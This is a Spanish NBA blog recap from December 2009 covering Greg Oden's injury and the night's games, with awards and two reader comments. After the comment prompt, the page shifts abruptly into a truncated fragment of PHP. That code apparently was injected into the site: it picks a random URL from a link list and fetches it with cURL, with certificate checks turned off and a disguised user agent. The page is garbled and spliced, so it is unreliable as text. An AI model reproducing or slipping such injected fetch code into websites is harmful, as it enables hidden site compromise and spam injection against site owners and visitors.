La Crónica (05/12/09)

06 de December de 2009 por Jabho

Con algo de retraso, cosa de los puentes, repasamos lo más destacado de la jornada de ayer que empieza con una mala noticia: Greg Oden vuelve a lesionarse y van… Nuevamente grave, nuevamente la rodilla y nuevamente parece que será “out for the season“. Es inevitable pensar en Sam Bowie, otro blazer desafortunado en el que se depositaron muchas esperanzas, pero no sólo en Bowie. Igual que algunos jugadores son prodigios físicos de regularidad y encadenan rachas espectaculares de partidos jugados, a otros es raro verlos una temporada entera, y cuando vuelven lo hacen con la etiqueta de “sospechosos” ya que si está en tu equipo te preguntas cuando se lesionará este año (T-Mac, Ming,… Cristal de Bohemia´s Club).

Sin Oden los Blazers llegaron a un final igualado contra Houston, y a falta de pocos segundos iban uno abajo. Balón para Roy y clin, clin, caja ¿Esta historia no la vivimos el año pasado? La cosa es que Oden estaba jugando a muy buen nivel y demostrando que podía marcar diferencias. Sin él, ni Outlaw, LaMarcus debería dar un paso adelante y demostrar que vale el jugoso contrato sacado, Pryzbilla tendrá mas minutos y hará su trabajo como siempre, pero pinta corta la rotación interior para aspirar a algo serio… Hay tiempo hasta el trade deadline, y no será por falta activos. Veremos que se saca de la manga Kevin Pritchard pero vaya por delante que creo que un cambio de aires a Rudy no le vendría nada mal.

Lo de Adelman y Houston mejor no hablamos, porque me imagino este equipo en manos de la mitad de los entrenadores de la liga y el record de los Nets igual era compartido. Ganaran o perderán, pero siguen dando una gran imagen.  La duda ¿qué hacemos con T-Mac? Sé que suena a herejía pero dudo que T-Mac mejore los actuales Rockets.

Anoche se jugaban muchos partidos interesantes, con equipos punteros sobre todo del Oeste. Los Nuggets emularon a los Celtics y se llevaron la victoria del AT&T Center. Valoro esta victoria de los Nuggets porque no tengo mucha confianza en ellos. ¡Ah! y Melo, poco santo de mi devoción, sigue a nivel MVP.  Por su parte los Spurs no están bien, pero ni Parker ni Manu están en plenitud, así que con ellos hay que esperar. Hasta abril por lo menos yo no los entierro.

Más de gallitos. Los Hawks, que venían perdiendo vuelo, tumbaron a los Mavs con mucho físico y mucha defensa. Un equipo muy racheado estos halcones, pero que cuando están bien son muy, muy peligrosos. Especialmente para equipos entrados en años.

Los Suns vencieron los Kings que están haciendo un inicio de temporada muy digno. Sergio jugó casi lo mismo que Beno, y eso es buena noticia. A ver si conserva los 20 minutitos que se ha ganado los últimos partidos.

Por otro lado Toronto le metió un correctivo importante a los Bulls, que con un Rose a medio gas no acaban de levantar el vuelo. Meterle 78 puntos a la durísima defensa de los Raptors da que pensar. Calde sigue sin regularidad y es raro en él, mala señal. Los Magic vencieron a los Warriors con algo más de dificultad de lo previsto, los Jazz fallaron ante los Wolves y los Pacers perdieron contra los Clippers.

Cerramos con la derrota de los Sixers ante los Bobcats, y van 9 seguidas. No he entrado mucho en el debate estrella del blog, pero con los mandarinazos que se han jugado este año Iguodala o Williams, yo creo que peor no les va a ir. Los Sixers son un equipo que no sabe a lo que juega más allá de correr sin sentido para que algunos destaquen. Parece que no se llevaban muy bien Igu e Iverson… Veremos si la cosa mejora en esta nueva etapa. Por cierto, canasta in extremis de Felton.

PREMIOS

MVP: Para Carmelo Anthony y sus 34 puntos con 7 asistencias. en un campo difícil. Esta jugando a un nivel francamente bueno este año… espereamos que dure.

Rookie: Premio para Evans en su buen partido ante los Suns (21-7-6). Flynn, DeRozan y Ellington también se merecen mención.

Sorpresa: Me quedaría con los sólo 78 puntos que le han metido a los Raptor o con los 15 rebotes del gladiador Marvin Williams… Se espera mucho de él, pero no por eso vamos a dejar de destacar el partidazo de Anthony Randolph con 28 puntos, 13 rebotes y 5 asistencias.

Decepción: 75 puntos de los Mavs, 49 entre Dirk y Terry. El resto ¿a qué juega?

MEV: El de un supercrack con Dirk Nowitzki… Los mejores lo son porque siempre están ahí.

Comenta

2 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Mandarinazos de Lou?
    Tío, mira sus porcentajes de tiros de campo, estaba en un 49%

      Citar

  2. Jabho dice:
    #2

    Vale que los mandarinazos sean más de Igu. Los Sixers juegan de pena y con Lou Williams lo mismo. Es una pena porque esperaba más de Eddie Jordan… Tienen equipo para hacer más que correr y salir en el top-10. No sé si Iverson lo arreglará, pero al menos yo también me arriesgaría…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>